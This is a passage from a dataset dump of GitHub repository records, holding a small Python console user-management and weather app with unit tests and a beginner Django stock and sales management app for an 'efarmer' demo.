repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
renukartamboli/assignment
https://github.com/renukartamboli/assignment
02ca5df5f66a3fec01f569ad6b1ff79a48c14252
869e86d337c82bfe0b9f500b0a5fa9daee5c59aa
67c698098ed62c61f33f5bb502e420772d6f7a63
refs/heads/main
2023-09-04T14:31:45.973309
2021-10-31T16:15:19
2021-10-31T16:15:19
421,112,056
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 14, "blob_id": "0f585798828eafc1509cc3877a44db747ccf9c60", "content_id": "8d81f1afe4308f29ff8d83ed65365397ca572413", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 45, "num_lines": 6, "path": "/README.md", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "\npython -m unittest unitTests.py to run tests.\n\n\n\n\npython assignment.py to run application\n" }, { "alpha_fraction": 0.5149713158607483, "alphanum_fraction": 0.529411792755127, "avg_line_length": 37.923728942871094, "blob_id": "a684270593291c7c56db335ddc989c39dbc0764c", "content_id": "7e0871318f4221b2472f5214561de5814ee72570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4709, "license_type": "no_license", "max_line_length": 453, "num_lines": 118, "path": "/assignment.py", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "from cryptography.fernet import Fernet\r\nclass Switcher(object):\r\n users = {}\r\n weatherInformation= {\"goa\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"jaipur\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"banglore\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"-90/+90\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12}}\r\n key = Fernet.generate_key()\r\n cipherSuite = Fernet(key)\r\n def __init__(self):\r\n Switcher.users = {'testUser':Switcher.cipherSuite.encrypt('123'.encode())}\r\n def Operation(self,method_name):\r\n method=getattr(self,method_name,lambda :'Invalid')\r\n return method()\r\n \r\n def create(self):\r\n print(\"enter user name:\")\r\n user = input()\r\n print(\"enter password:\")\r\n password = input()\r\n Switcher.users[user]=Switcher.cipherSuite.encrypt(password.encode())\r\n print(\"User created Successfully!!\")\r\n \r\n def update(self):\r\n print(\"Enter your userName to update\")\r\n user = input()\r\n password = Switcher.users[user]\r\n print(\"Do you want to update username? y/n\")\r\n ans = input()\r\n if(ans == \"y\"):\r\n print(\"Enter new userName\")\r\n enteredUser = input()\r\n print(\"Enter your password\")\r\n i =3\r\n p=0\r\n while(i!=0):\r\n enteredPass = input()\r\n if(Switcher.cipherSuite.decrypt(password).decode()==enteredPass):\r\n del Switcher.users[user]\r\n Switcher.users[enteredUser] = password\r\n print(\"Username updated successfully\")\r\n p=1\r\n break\r\n else:\r\n print(\"incorrect password\")\r\n i-=1\r\n if(p!=1):\r\n print(\"Incorrect password attemp 3 times.Please try again later.\")\r\n print(\"Do you want to update password? y/n\")\r\n ans = input()\r\n if(ans==\"y\"):\r\n print(\"Enter old password\")\r\n i=3\r\n while(i!=0):\r\n enteredPass = input()\r\n if(Switcher.cipherSuite.decrypt(password).decode()==enteredPass):\r\n print(\"enter new password\")\r\n newPass = input()\r\n Switcher.users[user]=Switcher.cipherSuite.encrypt(password)\r\n p=1\r\n print(\"Password updated Successfully!!\")\r\n break\r\n else:\r\n print(\"incorrect password\")\r\n i-=1\r\n if(p!=1):\r\n print(\"Incorrect password attemp 3 times.Please try again later.\")\r\n \r\n \r\n \r\n def delete(self):\r\n print(\"Enter user name to delete\")\r\n user = input()\r\n del Switcher.users[user]\r\n print(\"User deleted Successfully\")\r\n\r\n def readAll(self):\r\n print(\"User Entries:\")\r\n for key,value in Switcher.users.items():\r\n print(key,end=\"\\t\")\r\n print(\"\\n\")\r\n\r\n def weatherInfo(self):\r\n print(\"Enter City Name or Longitude and Latitude in following manner: Longitude/Latitude\")\r\n location = input()\r\n if(location not in Switcher.weatherInformation.keys()):\r\n print(\"no weather info for this location\")\r\n return\r\n for info in Switcher.weatherInformation[location]:\r\n print(info,':',Switcher.weatherInformation[location][info])\r\n\r\n def helpCmd(self):\r\n return \"Press 1 for creating new user \\n Press 2 to update user \\n Press 3 to delete user \\n Press 4 to print all users \\n Press 5 for weather information \\n --help for help command\"\r\n \r\nif __name__ == \"__main__\":\r\n s=Switcher()\r\n Choice = 0\r\n while(Choice!=\"exit\"):\r\n print(\"\\n\")\r\n print(\"Enter your Choice:\")\r\n print(\"1 - creating new user\")\r\n print(\"2 - update user\")\r\n print(\"3 - delete user\")\r\n print(\"4 - print all users\")\r\n print(\"5 - weather information\")\r\n print(\"--help for help command\")\r\n print(\"Type exit to quit\")\r\n print(\"\\n\")\r\n Choice = input()\r\n if(Choice==\"--help\"):\r\n print(s.Operation('helpCmd'))\r\n if(Choice=='1'):\r\n s.Operation('create')\r\n if(Choice=='2'):\r\n s.Operation('update')\r\n if(Choice=='3'):\r\n s.Operation('delete')\r\n if(Choice=='4'):\r\n s.Operation('readAll')\r\n if(Choice=='5'):\r\n s.Operation('weatherInfo')" }, { "alpha_fraction": 0.6254940629005432, "alphanum_fraction": 0.6403161883354187, "avg_line_length": 37.72549057006836, "blob_id": "922ce237cd78d6553d3f2e65d6a471e04fad5eec", "content_id": "c333cdfcdb020af06ca18582b78cb0639471ba68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2024, "license_type": "no_license", "max_line_length": 232, "num_lines": 51, "path": "/unitTests.py", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "import unittest\r\nimport builtins\r\nimport pytest\r\nimport io\r\nimport unittest.mock\r\nfrom unittest.mock import patch\r\nfrom assignment import Switcher\r\n\r\n\r\nclass TestMethods(unittest.TestCase): \r\n \r\n def testhelp(self):\r\n swicther = Switcher()\r\n self.assertEqual(swicther.Operation('helpCmd'), \"Press 1 for creating new user \\n Press 2 to update user \\n Press 3 to delete user \\n Press 4 to print all users \\n Press 5 for weather information \\n --help for help command\")\r\n\r\n @unittest.mock.patch('sys.stdout', new_callable=io.StringIO)\r\n def assert_stdout(self,operation,expected_output, mock_stdout):\r\n swicther = Switcher()\r\n swicther.Operation(operation) \r\n self.assertEqual(mock_stdout.getvalue(), expected_output)\r\n\r\n def testReadUsers(self):\r\n self.assert_stdout('readAll','User Entries:\\ntestUser\\t\\n\\n')\r\n \r\n def testDeleteUsers(self):\r\n swicther = Switcher()\r\n original_input = builtins.input\r\n builtins.input = lambda: 'testUser'\r\n swicther.Operation('delete')\r\n self.assertEqual(swicther.users,{})\r\n\r\n def testWeatherInfo(self):\r\n original_input = builtins.input\r\n builtins.input = lambda: 'goa'\r\n self.assert_stdout('weatherInfo','Enter City Name or Longitude and Latitude in following manner: Longitude/Latitude\\nhumidity : 5\\nPressure : 6\\nAverage Temperature : 30\\nWind Speed : 5\\nWind Degree : 9\\nUI index : 12\\n')\r\n \r\n def testUpdateUser(self):\r\n mock_args = ['testUser','y','testUser1','234','123','y','123','123']\r\n with unittest.mock.patch('builtins.input', side_effect=mock_args):\r\n swicther = Switcher()\r\n swicther.Operation('update')\r\n \r\n def testCreateUser(self):\r\n mock_args = ['testUser1','123']\r\n with unittest.mock.patch('builtins.input', side_effect=mock_args):\r\n swicther = Switcher()\r\n swicther.Operation('create')\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()" } ]
3
kiamasimon/efarmer
https://github.com/kiamasimon/efarmer
4755c6a38cf225011816879cc6cfb4e402a54f30
c920dd4d16085ecedd9f0e43e25b155142c28113
fd8739d56b3f5635f407aeb341e59f76599a090d
refs/heads/master
2020-05-30T06:09:03.681382
2019-05-31T14:40:24
2019-05-31T14:40:24
189,573,481
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6736990213394165, "alphanum_fraction": 0.6891701817512512, "avg_line_length": 34.5, "blob_id": "7f83978635437347f702806d098e176dbe398f63", "content_id": "99ca02a1cb430cca3c7a87ec8216a99d20f8d033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 711, "license_type": "no_license", "max_line_length": 100, "num_lines": 20, "path": "/README.md", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Efarmer\nDjango E-FARMER DEMO\n\n### Setting up\n##### Install and set up python virtual environment\n reference : http://timmyreilly.azurewebsites.net/python-pip-virtualenv-installation-on-windows/\n##### Download the project from the link provided\n Start your virtual environment through command prompt:\n \\path\\to\\env\\Scripts\\activate\n Navigate to the location of the downloaded project: eg.\n cd /Desktop/efarmer\n Use:\n pip install -r requirements.txt to install the projects requirements including django\n To run your development server, use:\n python manage.py runserver\n \n##### Requirements\n Django==2.2.1\n pytz==2019.1\n sqlparse==0.3.0\n\n" }, { "alpha_fraction": 0.5150115489959717, "alphanum_fraction": 0.5912240147590637, "avg_line_length": 21.789474487304688, "blob_id": "26af5609215349fe25138a97c909c3c24bb4eb48", "content_id": "d5266c23d010f1bcfd06499777ba51ad616b7e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/accountant/migrations/0006_product_number_of_units.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:44\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0005_auto_20190526_1836'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='number_of_units',\n field=models.IntegerField(default=12),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.4169014096260071, "alphanum_fraction": 0.4187793433666229, "avg_line_length": 28.61111068725586, "blob_id": "0448f62a9145d4bd38e5c9c878c337e279d0f50d", "content_id": "bdb86b2b6107643c1c41c122f0a2fa6c06573c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 108, "num_lines": 36, "path": "/accountant/templates/accountant/sales.html", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "{% extends 'layouts/base.html' %}\n{% load static %}\n\n{% block content %}\n<div class=\"col-xs-12\">\n<div class=\"card\">\n <div class=\"card-header\">\n <strong>Stocks</strong>\n <a class=\"btn btn-success pull-right\" href=\"{% url 'Accountant:add_sale' customer.id%}\">Add Sale</a>\n </div>\n <div class=\"card-body\">\n <div class=\"table-flip-scroll table-responsive\">\n <table class=\"table table-striped dataTable\">\n <thead>\n <tr>\n <th>Product Name</th>\n <th>Price</th>\n <th>Units</th>\n </tr>\n </thead>\n <tbody>\n {% for sale in customer_sales %}\n <tr>\n <td><a href=\"\">{{ sale.product.name }}</a></td>\n <td>{{ sale.price_per_unit }}</td>\n <td>{{ sale.units_sold }}</td>\n </tr>\n {% endfor %}\n </tbody>\n </table>\n\n </div>\n </div>\n</div>\n</div>\n{% endblock %}" }, { "alpha_fraction": 0.696571409702301, "alphanum_fraction": 0.7068571448326111, "avg_line_length": 28.183332443237305, "blob_id": "fb73fee79190870a5da78e7c6c4cdddf553b07ae", "content_id": "c187b463a8165e2b4b9992f8c44893849aaa92bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 70, "num_lines": 60, "path": "/accountant/models.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\n\n\nclass Accountant(get_user_model()):\n location = models.CharField(max_length=100, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Accountant'\n\n\nclass Admin_User(get_user_model()):\n location = models.CharField(max_length=100, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Admin'\n\n\nclass Stock(models.Model):\n name = models.CharField(max_length=250)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Stock'\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=250)\n number_of_units = models.IntegerField()\n stock = models.ForeignKey(Stock, on_delete=models.CASCADE)\n buying_price = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Product'\n\n\nclass Customer(models.Model):\n first_name = models.CharField(max_length=250)\n last_name = models.CharField(max_length=250)\n phone_number = models.IntegerField()\n\n\nclass Sale(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n customer = models.ForeignKey(Customer, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n units_sold = models.IntegerField()\n price_per_unit = models.IntegerField()\n total = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Sale'" }, { "alpha_fraction": 0.6438679099082947, "alphanum_fraction": 0.6438679099082947, "avg_line_length": 20.769229888916016, "blob_id": "a9a26f23aed5db7efc6c777d212f805d9e267fff", "content_id": "3a8a595176288e5ec0bf1ce1f9e597ee70db5a53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 89, "num_lines": 39, "path": "/accountant/forms.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib.auth.forms import UserCreationForm\nfrom django.forms import ModelForm\n\nfrom accountant.models import Accountant, Product, Sale, Stock, Customer\n\n\nclass SignUpForm(UserCreationForm):\n\n class Meta:\n model = Accountant\n fields = ('username', 'first_name', 'last_name', 'email', 'location')\n\n\nclass AddStockForm(ModelForm):\n\n class Meta:\n model = Stock\n fields = ('name',)\n\n\nclass AddCustomerForm(ModelForm):\n\n class Meta:\n model = Customer\n fields = ('first_name', 'last_name', 'phone_number')\n\n\nclass AddProductForm(ModelForm):\n\n class Meta:\n model = Product\n fields = ('name', 'stock', 'buying_price')\n\n\nclass AddSaleForm(ModelForm):\n\n class Meta:\n model = Sale\n fields = ('user', 'customer', 'product', 'price_per_unit', 'units_sold', 'total')" }, { "alpha_fraction": 0.5530726313591003, "alphanum_fraction": 0.5810055732727051, "avg_line_length": 30.964284896850586, "blob_id": "e2e2c343c00d108d689f9cf5d3c2704dcbaf057d", "content_id": "41431e34f6c6bf2c5934731c5f88ccf1834347b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/accountant/migrations/0008_auto_20190531_0752.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:52\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0007_sale_customer_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('first_name', models.CharField(max_length=250)),\n ('last_name', models.CharField(max_length=250)),\n ('phone_number', models.IntegerField()),\n ],\n ),\n migrations.AlterField(\n model_name='sale',\n name='customer_name',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Customer'),\n ),\n ]\n" }, { "alpha_fraction": 0.4932975769042969, "alphanum_fraction": 0.5764074921607971, "avg_line_length": 19.72222137451172, "blob_id": "2ff397cb3cf76c4fa69b2f6c3459e8971b48c6b0", "content_id": "73311276aeb4bdf302d4801515b421e3d13446ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/accountant/migrations/0009_auto_20190531_0845.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 08:45\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0008_auto_20190531_0752'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='sale',\n old_name='customer_name',\n new_name='customer',\n ),\n ]\n" }, { "alpha_fraction": 0.6323162317276001, "alphanum_fraction": 0.6323162317276001, "avg_line_length": 32.410255432128906, "blob_id": "244e12e6b8d25bc201fa119ca38df61bc2cb9150", "content_id": "076a3915396610ef2babf25329905921b494e537", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5211, "license_type": "no_license", "max_line_length": 99, "num_lines": 156, "path": "/accountant/views.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom accountant.forms import SignUpForm, AddProductForm, AddStockForm, AddCustomerForm, AddSaleForm\nfrom accountant.models import Accountant, Admin_User, Stock, Product, Customer, Sale\n\napp_name = 'Accountant'\n\n\ndef landing(request):\n return render(request, 'accountant/landing_page.html')\n\n\ndef sign_up(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n print(form)\n # pdb.set_trace()\n if form.is_valid():\n farmer = form.save(commit=False)\n farmer.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('Farmer:my_sales')\n else:\n messages.error(request, 'Form Invalid')\n return redirect('Accounts:signup')\n else:\n form = SignUpForm()\n return render(request, 'registration/sign_up.html',{'form':form})\n\n\ndef sign_in(request):\n msg = []\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n if Accountant.objects.filter(user_ptr_id=user.id).exists():\n return redirect('Accountant:dashboard')\n elif Admin_User.objects.filter(user_ptr_id=user.id).exists():\n return redirect('Accountant:dashboard')\n else:\n msg.append('You account has been deactivated!')\n else:\n msg.append('Invalid login')\n return render(request, 'registration/sign_in.html', {'errors':msg})\n\n\ndef stocks(request):\n stocks = Stock.objects.all()\n return render(request, 'accountant/view_stocks.html', {'stocks':stocks})\n\n\ndef new_stock(request):\n if request.method == 'POST':\n form = AddStockForm(request.POST)\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request, 'Stock Added Successfully')\n return redirect('Accountant:stocks')\n else:\n messages.error(request, 'Invalid Details Please Try Again')\n return render(request, 'accountant/add_stock.html')\n\n\ndef products(request, stock_id):\n stock = Stock.objects.get(id=stock_id)\n products = Product.objects.filter(stock=stock)\n return render(request, 'accountant/view_products.html', {'products':products, 'stock':stock})\n\n\ndef new_product(request, stock_id):\n stock = Stock.objects.get(id=stock_id)\n form = AddProductForm(request.POST)\n\n if request.method == 'POST':\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request,'Product Added Successfully')\n return redirect('Accountant:products', stock.id)\n else:\n messages.error(request, 'Failed to add the product')\n return redirect('Accountant:new_product', stock.id)\n else:\n form = AddProductForm()\n return render(request, 'accountant/add_product.html',{'stock':stock, 'form':form})\n\n\ndef dashboard(request):\n return render(request, 'layouts/base.html')\n\n\ndef customers(request):\n customers = Customer.objects.all()\n context = {\n 'customers': customers\n }\n return render(request, 'accountant/customers.html', context)\n\n\ndef add_customer(request):\n if request.method == 'POST':\n form = AddCustomerForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Customer Added Successfully')\n return redirect('Accountant:customers')\n else:\n messages.error(request, 'Form Validation Failed')\n return redirect('Accountant:customers')\n return render(request, 'accountant/add_customer.html')\n\n\ndef sales(request, customer_id):\n customer = Customer.objects.get(id=customer_id)\n customer_sales = Sale.objects.filter(customer=customer)\n context = {\n 'customer': customer,\n 'customer_sales': customer_sales\n }\n return render(request, 'accountant/sales.html', context)\n\n\ndef add_sale(request, customer_id):\n admin = Admin_User.objects.get(user_ptr_id = request.user.id)\n customer = Customer.objects.get(id=customer_id)\n products = Product.objects.all()\n if request.method == 'POST':\n form = AddSaleForm(request.POST)\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request, 'Sale added successfully')\n return redirect('Accountant:sales', customer_id)\n else:\n messages.error(request, 'Form Validation Failed')\n return redirect('Accountant:sales', customer_id)\n\n context = {\n 'admin': admin,\n 'customer': customer,\n 'products': products\n }\n return render(request, 'accountant/add_sale.html', context)" }, { "alpha_fraction": 0.5231441259384155, "alphanum_fraction": 0.5340611338615417, "avg_line_length": 34.78125, "blob_id": "003cb74b0831d0f5355d8bd9e9210a2c3bbf392d", "content_id": "24dd5f2ae828affc667ecaa2b48039aa7623085e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "no_license", "max_line_length": 118, "num_lines": 64, "path": "/accountant/migrations/0003_auto_20190526_1816.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:16\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accountant', '0002_admin'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=250)),\n ('buying_price', models.IntegerField()),\n ],\n options={\n 'verbose_name': 'Product',\n },\n ),\n migrations.CreateModel(\n name='Stock',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=250)),\n ],\n options={\n 'verbose_name': 'Stock',\n },\n ),\n migrations.AlterModelOptions(\n name='accountant',\n options={'verbose_name': 'Accountant'},\n ),\n migrations.AlterModelOptions(\n name='admin',\n options={'verbose_name': 'Admin'},\n ),\n migrations.CreateModel(\n name='Sales',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('units_sold', models.IntegerField()),\n ('price_per_unit', models.IntegerField()),\n ('total', models.IntegerField()),\n ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Product')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Sale',\n },\n ),\n migrations.AddField(\n model_name='product',\n name='stock',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Stock'),\n ),\n ]\n" }, { "alpha_fraction": 0.6740396022796631, "alphanum_fraction": 0.6740396022796631, "avg_line_length": 46.77777862548828, "blob_id": "c9d3bc36542bec8a53d05239f245eca4134ff0d6", "content_id": "3fa28024218ecd90dca7e1366905ea80e1dafb47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 80, "num_lines": 18, "path": "/accountant/urls.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom accountant import views\napp_name = 'Accountant'\nurlpatterns = [\n path('landing_page', views.landing, name='landing_page'),\n path('sign_up', views.sign_up, name='sign_up'),\n path('sign_in', views.sign_in, name='sign_in'),\n path('dashboard', views.dashboard, name='dashboard'),\n path('stocks', views.stocks, name='stocks'),\n path('products/<int:stock_id>', views.products, name='products'),\n path('new/product/<int:stock_id>', views.new_product, name='new_product'),\n path('new/stock', views.new_stock, name='new_stock'),\n path('customers', views.customers, name='customers'),\n path('customer/sales/<int:customer_id>', views.sales, name='sales'),\n path('add/customer', views.add_customer, name='add_customer'),\n path('add/customer/sale/<int:customer_id>', views.add_sale, name='add_sale')\n]" }, { "alpha_fraction": 0.5534883737564087, "alphanum_fraction": 0.6255813837051392, "avg_line_length": 21.63157844543457, "blob_id": "124b2358f30612cf1236a8bed7c42a74752dd5c6", "content_id": "3e1a39eb8bd7199b49f7732a2470c2807a3d771e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/accountant/migrations/0004_auto_20190526_1821.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:21\n\nfrom django.conf import settings\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accountant', '0003_auto_20190526_1816'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='Sales',\n new_name='Sale',\n ),\n ]\n" }, { "alpha_fraction": 0.5444444417953491, "alphanum_fraction": 0.5933333039283752, "avg_line_length": 22.6842098236084, "blob_id": "ac14a83ce152629cacb1118d6ca9e5e7d13ea638", "content_id": "db60f4a84c291cc5ba6b0efa1f8aeaabeda25d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 67, "num_lines": 19, "path": "/accountant/migrations/0007_sale_customer_name.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:48\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0006_product_number_of_units'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='sale',\n name='customer_name',\n field=models.CharField(default='simo', max_length=250),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.8177570104598999, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 25.875, "blob_id": "8b6a8277ad8ccaa655ea26fc66c6f06eb867aa27", "content_id": "29df88a24fca8f28fef82b8fcf42e2fbb0aec96c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 59, "num_lines": 8, "path": "/accountant/admin.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\n# Register your models here.\nfrom accountant.models import Admin_User, Accountant, Stock\n\nadmin.site.register(Admin_User)\nadmin.site.register(Accountant)\nadmin.site.register(Stock)" }, { "alpha_fraction": 0.44909611344337463, "alphanum_fraction": 0.45099905133247375, "avg_line_length": 29.941177368164062, "blob_id": "58f62f707c9aa9df15571a6bee7f9dd890680d95", "content_id": "d577a4192e80a8f719bb9764c029d24af01860ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 134, "num_lines": 34, "path": "/accountant/templates/accountant/customers.html", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "{% extends 'layouts/base.html' %}\n{% load static %}\n\n{% block content %}\n<div class=\"col-xs-12\">\n<div class=\"card\">\n <div class=\"card-header\">\n <strong>Stocks</strong>\n <a class=\"btn btn-success pull-right\" href=\"{% url 'Accountant:add_customer' %}\">New Customer</a>\n </div>\n <div class=\"card-body\">\n <div class=\"table-flip-scroll table-responsive\">\n <table class=\"table table-striped dataTable\">\n <thead>\n <tr>\n <th>Customer Name</th>\n <th>Phone Number</th>\n </tr>\n </thead>\n <tbody>\n {% for customer in customers %}\n <tr>\n <td><a href=\"{% url 'Accountant:sales' customer.id %}\">{{ customer.first_name }} {{ customer.last_name }}</a></td>\n <td>{{ customer.phone_number}}</td>\n </tr>\n {% endfor %}\n </tbody>\n </table>\n\n </div>\n </div>\n</div>\n</div>\n{% endblock %}" }, { "alpha_fraction": 0.5451388955116272, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 29.63829803466797, "blob_id": "96e5764ae9c98910a68749f3dd7e1ff124ce7e78", "content_id": "a80383dda5c87d2190847b43d0c7f0485681c350", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": "/accountant/migrations/0005_auto_20190526_1836.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:36\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0004_auto_20190526_1821'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='product',\n name='updated_at',\n field=models.DateTimeField(auto_now=True),\n ),\n migrations.AddField(\n model_name='sale',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='sale',\n name='updated_at',\n 